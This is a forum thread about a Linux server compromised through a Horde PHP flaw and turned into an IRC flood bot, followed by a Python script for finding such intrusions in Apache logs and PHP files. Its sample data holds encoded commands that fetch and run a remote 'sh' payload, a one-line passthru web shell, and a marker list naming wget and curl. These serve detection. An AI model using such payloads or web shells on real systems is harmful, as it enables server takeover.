//moderator.note: (pruned from) in-possible-reply-to (stale thread):
http://www.linuxquestions.org/questi...d.php?t=205751
You were absolutely right, I didn't even think of searching for wget - my box had "vadim" and "energymech" installed on it via an exploit on the Horde help system, using passthru().
My box was acting as an IRC bot for some place in Amsterdam and flooding some box in the Czech Republic. BTW: I had flood stuff in /var/tmp/fl/ and IRC stuff in "/var/tmp/ " - note the space as a directory name. The Energy Mech app was named "sh".
I stopped upgrading Horde as it was such a pain to do, and I got what I deserved. What a relief, knowing how it was done and what needs fixing (I hope). Time to rebuild.
Yes, I pulled the cable as soon as I knew - but then, this box is only a personal toy.
Quote:
Originally Posted by rash
The bug was in the PHP of your site. Turn on safe_mode in your php.ini config file, then restart Apache. Locate any suspicious .php files in your web server that have functions like system, and search for the string wget in your Apache logs to find the invader's IP.
Upgrade the version of your kernel; some 2.4 kernel versions have a bug that allows exploiting the kernel to gain root access. Verify the ports open on your system and check whether there are suspicious executables in ps.
Regards.
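The two checks rash suggests above (grep the Apache access log for "wget" to find the attacker's source address, and look for PHP files that call command-execution functions) are easy to script. The following is an added example, not code from the thread or from Horde; the log lines, hosts and PHP snippets are constructed for the demonstration, and it URL-decodes each request line first so that a percent-encoded payload does not slip past a plain text search. Note that safe_mode, which rash recommends, was removed in PHP 5.4, so on any current install the PHP-source scan and log review are the parts that still apply.

```python
import re
import urllib.parse
from collections import Counter

# Constructed Apache combined-log lines for this example (hosts are
# documentation addresses, paths are made up; nothing here is from the thread).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Nov/2004:02:14:33 +0000] "GET /horde/services/help/ HTTP/1.1" 200 1523 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Nov/2004:02:15:01 +0000] "GET /horde/services/help/?q=wget%20http%3A%2F%2F198.51.100.9%2Fsh HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [10/Nov/2004:02:16:10 +0000] "GET /index.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Nov/2004:02:16:45 +0000] "GET /horde/services/help/?q=cd%20%2Fvar%2Ftmp%3B.%2Fsh HTTP/1.1" 200 312 "-" "Mozilla/4.0"',
    'this line is not in log format and is skipped',
]

# Leading fields of the Apache combined log format: client IP, ident, user,
# timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

# Substrings in a decoded request line that deserve a closer look. The list is
# an assumption for this example; extend it to match what you see in your logs.
SUSPICIOUS = ("wget", "curl ", "passthru", "system(", "/var/tmp", "/tmp/")


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode %XX and '+' so an encoded "wget" is found just like a plain one.
    rec["req_decoded"] = urllib.parse.unquote_plus(rec["req"])
    return rec


def find_suspicious(lines):
    """Return (ip, timestamp, matched_markers, decoded_request) for each hit."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        matched = [s for s in SUSPICIOUS if s in rec["req_decoded"]]
        if matched:
            hits.append((rec["ip"], rec["ts"], matched, rec["req_decoded"]))
    return hits


def ips_by_hits(hits):
    """Count hits per source IP; the top entry is the address to look at first."""
    return Counter(ip for ip, *_ in hits)


# PHP functions that hand a string to a shell or spawn a process. A file that
# calls one of these with request-controlled input is the kind of thing rash
# means by "suspicious .php files".
PHP_DANGEROUS = re.compile(r"\b(passthru|system|exec|shell_exec|popen|proc_open)\s*\(")


def scan_php_sources(sources):
    """sources: mapping of path -> file contents. Return {path: [function names]}."""
    findings = {}
    for path, src in sources.items():
        names = sorted(set(PHP_DANGEROUS.findall(src)))
        if names:
            findings[path] = names
    return findings


# Constructed PHP snippets standing in for files read from the docroot.
SAMPLE_PHP = {
    "help.php": "<?php passthru($_GET['q']); ?>",
    "index.php": "<?php echo 'hello'; ?>",
}

if __name__ == "__main__":
    for ip, ts, markers, req in find_suspicious(SAMPLE_LOG):
        print(f"{ip} [{ts}] {markers}: {req}")
    print("hits per IP:", dict(ips_by_hits(find_suspicious(SAMPLE_LOG))))
    print("php files calling exec-style functions:", scan_php_sources(SAMPLE_PHP))
```

To run it against a real server, replace SAMPLE_LOG with the lines of /var/log/apache2/access.log (or wherever your distribution keeps it) and SAMPLE_PHP with the contents of the .php files under the docroot. Review the hits by hand: "wget" in a request is strong evidence but not proof, and the log only records what the web server saw, not what ran afterwards.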